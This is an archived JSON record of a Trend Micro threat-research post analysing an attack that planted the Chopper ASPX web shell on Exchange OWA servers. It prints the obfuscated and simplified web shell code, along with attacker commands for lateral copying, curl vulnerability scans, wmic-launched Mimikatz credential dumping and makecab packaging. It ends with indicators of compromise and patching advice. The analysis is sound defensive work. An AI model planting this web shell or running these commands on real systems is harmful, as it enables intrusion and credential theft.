{
	"id": "be01c695-6065-4680-acf8-3590b9ed952c",
	"created_at": "2026-04-06T00:08:15.111105Z",
	"updated_at": "2026-04-10T03:21:03.171211Z",
	"deleted_at": null,
	"sha1_hash": "60bd0d0b613066d4d4121657b7ccd2711ebcb77e",
	"title": "Chopper ASPX Web Shell Used in Targeted Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 105740,
	"plain_text": "Chopper ASPX Web Shell Used in Targeted Attack\r\nBy Trend Micro\r\nPublished: 2021-01-29 · Archived: 2026-04-05 21:03:49 UTC\r\nAPT \u0026 Targeted Attacks\r\nWe dissect a targeted attack that made use of the Chopper ASPX web shell (Backdoor.ASP.WEBSHELL.UWMANA).\r\nBy: Trend Micro Jan 29, 2021 Read time: 5 min (1229 words)\r\nWeb shells, in their simplicity and straightforwardness, are highly potent when it comes to compromising systems and\r\nenvironments. These malicious code pieces can be written in ASP, PHP, and JSP, or any script that can execute a system\r\ncommand with a parameter that can pass through the web. Web shells can be embedded on web servers and can be used by\r\nmalicious actors to launch arbitrary code. In as little as 15 bytes, web shells can enable remote administration of an infected\r\nmachine or system. Threats such as this can be difficult to detect even with multiple security layers — especially if they are\r\nnot consolidated.\r\nIn this blog, we will dissect a targeted attack that made use of the Chopper ASPX web shell (detected by Trend Micro as\r\nBackdoor.ASP.WEBSHELL.UWMANA).\r\nTechnical Analysis\r\nInitial access\r\nBased on our investigation, the Chopper web shell is dropped via a system token, potentially via a Microsoft Exchange\r\nServer vulnerability. One notable vulnerability in the Microsoft Exchange Server is CVE-2020-0688, a remote code\r\nexecution bug. Microsoft issued a patch for this vulnerability in February 2020. However, the malicious actors behind this\r\nattack drop the Chopper web shell in the web directory folder to establish persistence. 
Through the ASPX file, malicious\r\nactors can establish a foothold in affected public-facing Outlook Web App (OWA) servers and send remote commands\r\nthrough them.\r\nOutlook Web App (Web Directory) - D:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium\\premium.aspx\r\nThe attack features the following script:\r\n\u003c%@ Page Language=\"Jscript\" Debug=true%\u003e\r\n\u003c%\r\nvar a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"UmVxdWVzdC5Gb3JtWyJjb21tYW5kIl0=\"));\r\nvar b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"dW5zYWZl\"));\r\nvar c=eval(a,b);\r\neval(c,b);\r\n%\u003e\r\nWhen simplified, the malicious script looks like this, with the eval being the executor and the Request.Form acquiring the\r\nparameter to be executed:\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%eval(Request.Form[\"Command\"],\"unsafe\");%\u003e\r\nWe’ve observed that in some cases, malicious actors insert this short script to avoid detection:\r\nFigure 1. A short script inserted by malicious actors to avoid detection\r\nUser Activity Checking\r\nOnce Chopper successfully infects a system, the malicious actor will issue a query user (quser) command in an attempt to\r\nidentify the primary user or those who are currently logged in as users in the system. Based on our observation, the quser\r\ncommand was used routinely throughout the attack to determine active remote sessions.\r\nFigure 2. 
The quser command is used to identify active remote sessions.\r\nDeobfuscation technique\r\nTo deploy its tools, it uses the expand command to extract package files dropped in the system.\r\nexpand (unknown).ex_ (unknown).dat\r\nexpand (unknown).ex_ (unknown).exe\r\nWe saw a noticeable difference with this attack compared to other Chopper attacks — its use of the .dat file extension, which\r\nis commonly used for data storage purposes, such as in a user profile’s ntuser.dat. In this particular Chopper attack, the .dat\r\nfiles are used as executables.\r\nLateral movement\r\nIt proceeded with copying the Chopper web shell into accessible shared folders in other hosts to gain access.\r\ncopy premium.aspx \"\\\\{hostname}\\d$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium\r\nIt also scans for vulnerabilities across the network by using an installed tool, Hacktool.Win32.CATLIKE.A, and a legitimate\r\ncURL, C:\\temp\\curl.dat.\r\nIt specifically scans for web server-related vulnerabilities and password weaknesses in Apache Tomcat, Citrix, and\r\nphpMyAdmin applications.\r\nApplication/Port - Command\r\nOracle WebLogic - curl.dat -v -H 'Content-Type: text/xml;charset=UTF-8' http://{ip address}:7001/wls-wsat/CoordinatorPortType\r\nOracle Console - curl.dat -vv http://{ip address}:7001/console/j_security_check -d j_username={username}\u0026j_password={password}\u0026submit=Login\r\nPHPMyAdmin - curl.dat -vv --connect-timeout 2 {ip address}/phpmyadmin\r\nApache Tomcat - s.dat -u http://{ip address}:8080/manager/html\r\nPorts 7001, 9095, 5556, 8080 - s.dat -i 10.217.229.189 -p {ports}\r\nTable 1. 
Commands used to scan for web server-related vulnerabilities and passwords on certain applications and ports\r\nWe saw that this attack also uses the WMI command line (wmic) utility to perform remote process execution on other\r\ninfected endpoints.\r\nExecution of arbitrary commands via session id\r\nSuccessful exploitation of CVE-2020-0688 gives Chopper access to system privileges. In one of the endpoints, it will drop\r\nand execute Trojan.Win32.PRIVESC.A. This trojan must be run under a user with SeTcbPrivilege. It allows an\r\nattacker to see all Windows sessions and can execute arbitrary commands on the session via session id.\r\nFigure 3. Examples of arbitrary commands being performed on the session via session id\r\nDiscovery\r\nFor its discovery, it uses typical Windows command-line tools such as nltest, ping, whoami, netstat, net, nslookup,\r\nhostname, and tasklist, which are commonly used in other attacks. In addition, a publicly available JoeWare domain tool\r\ncalled LG.exe, which is quite popular among attackers and domain admins alike, was installed and used in the attack.\r\nCredential access\r\nFor obtaining user credentials, the attackers used HackTool.MSIL.Mimikatz.AF, a modified version of the open-source\r\napplication Mimikatz, using the following parameters: x, xxx, xxxx, xxxasd.\r\nwmic /node:{ip address} process call create \"cmd.exe /c c:\\users\\mpBD6D42.dat xxxasd -pass \u003e c:\\users\\23.txt\"\r\nCollection\r\nThe attackers use wevtutil.exe to query security-related events from a target username and export it as a q.txt file. 
For\r\npackaging stolen credentials and other logs, it uses the makecab command instead of a third-party application such as\r\nrar.exe.\r\n· makecab a.txt \u003e 111\r\n· makecab aaa2.txt \u003e 1\r\nThe attacker uses installed security components or applications as filenames to hide in plain sight.\r\n· C:\\Program Files\\Trend Micro\\ ams p.dat\r\n· C:\\Oracle\\Oracle.dat\r\n· C:\\Program Files\\McAfee\\MacAfee.dat\r\nThese suspicious activities were seen via our XDR solution, which helped us monitor observable attack techniques and\r\nprovided critical security alerts including anomalous file extension execution, remote execution via system tools, web shell-related activities, and potential exploit attacks.\r\nSecurity recommendations\r\nWeb shells can be embedded in systems via security gaps such as vulnerabilities. Attackers will work to identify vulnerable\r\napplications used in systems to exploit them and install web shells for remote code execution or data exfiltration.\r\nWe provide some security recommendations to ensure that enterprises and organizations can defend against web shell\r\nattacks:\r\nPatch your systems and applications. Ensure proper vulnerability patches are applied for public-facing\r\napplications, such as Apache Tomcat, Oracle WebLogic Server, Microsoft Exchange Server, and PHPMyAdmin.\r\nImplement strong passwords. Do not use the same password for multiple applications or websites. Use multi-factor\r\nauthentication whenever possible and regularly update it.\r\nCheck for static keys in the IIS web.config file. 
As observed on CVE-2020-0688, the use of static keys — as\r\nopposed to randomly generated keys — can allow an attacker to execute arbitrary code by tricking the server into\r\ndeserializing ViewState data.\r\nEnterprises and organizations should have comprehensive and efficient protection, detection, prevention, and remediation\r\nbased on real-time, higher-confidence alerts to protect critical data and operations from sophisticated attacks and threats. A\r\nconsolidated view of all security sensors provides a single-pane-of-glass view that will promote quick and thorough\r\ninvestigation and response.\r\nTrend Micro Solutions\r\nTrend Micro’s comprehensive XDR solution applies the most effective expert analytics to the deep data sets\r\ncollected from Trend Micro solutions across the enterprise — including email, endpoints, servers, cloud workloads, and\r\nnetworks — making faster connections to identify and stop attacks. Powerful artificial intelligence (AI) and expert security\r\nanalytics correlate data from customer environments and Trend Micro’s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection. 
One console with one source of prioritized, optimized alerts supported with\r\nguided investigation simplifies the steps needed to fully understand the attack path and impact on the organization.\r\nIndicators of compromise\r\nFilename - Path - SHA-256 - Detection\r\nss.exe - C:\\temp\\ - ee63b49aca1495a170ea7273316385b606f3fd2df1e48e9f4de0f241d98bd055 - HackTool.Win32.CATLIKE.A\r\nLG.exe - C:\\temp\\, C:\\hp\\ - 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 - HackTool.Win32.JoeWare.A\r\nLG.dat - C:\\hp\\ - 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 - HackTool.Win32.JoeWare.A\r\nmpBD6D42.dat - C:\\Users, C:\\Perflogs, C:\\hp, C:\\temp - e9be71848d1faa0c41db4c6a1e901747d98fb0b3cca027f8be85ea5e339b75e3 - HackTool.MSIL.Mimikatz.AF\r\nSource: https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html"
	],
	"report_names": [
		"targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434095,
	"ts_updated_at": 1775791263,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/60bd0d0b613066d4d4121657b7ccd2711ebcb77e.pdf",
		"text": "https://archive.orkl.eu/60bd0d0b613066d4d4121657b7ccd2711ebcb77e.txt",
		"img": "https://archive.orkl.eu/60bd0d0b613066d4d4121657b7ccd2711ebcb77e.jpg"
	}
}